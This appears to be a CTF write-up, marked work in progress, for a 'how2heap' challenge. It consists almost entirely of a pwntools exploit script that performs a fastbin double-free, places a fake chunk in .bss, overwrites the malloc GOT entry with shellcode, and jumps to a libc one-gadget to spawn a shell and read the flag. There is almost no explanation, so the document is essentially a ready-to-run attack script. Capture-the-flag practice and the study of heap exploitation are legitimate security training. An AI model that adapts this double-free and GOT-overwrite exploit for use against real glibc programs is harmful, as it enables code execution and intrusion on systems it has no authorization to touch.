[PWN] how2heap - xf1les

xp0int

Posted on Sep 13 2021

WIP

```python
#!/usr/bin/env python3
import warnings
from pwn import *

warnings.filterwarnings("ignore", category=BytesWarning)
context(arch="amd64")
context(log_level="debug")
context.proxy = "127.0.0.1"

p = remote("192.168.40.193", 8889)  # GLIBC 2.23
# ~ p = process("./how2heap")


def free(idx):
    p.sendlineafter("> ", "3")
    p.sendlineafter(":", str(idx))


def add(ctx):
    p.sendlineafter("> ", "1")
    p.sendafter(":", ctx)


## Fastbin attack
for i in range(0x31):
    add('A')

free(0x2f)
free(0x2e)
free(0x2e)  # Double free

add(p64(0x602088))  # 0x602088 is the address of fake fast chunk
add("B")
add("C")

## Construct fake fast chunk at 0x602088
free(0x100000000 - 0xc)
free(0x100000000 - 0xc)

## shellcode for malloc
s = """
push 0x6020C0
pop rax
ret
nop
"""

## set `idx` on .bss section to -0xf
## -0xf is the offset to malloc GOT table entry
add(asm(s) + p32(0x100000000 - 0xf))

## shellcode for mprotect
s = """
push 0x1324ba
pop rbx
// r11: a libc address
// rbx: the offset to one gadget from r11
sub r11, rbx
// one gadget condition
xor rax, rax
call r11
"""
add(asm(s))

## call mprotect to get shell
p.sendlineafter("> ", "1")
p.sendline("cat flag")
p.interactive()
```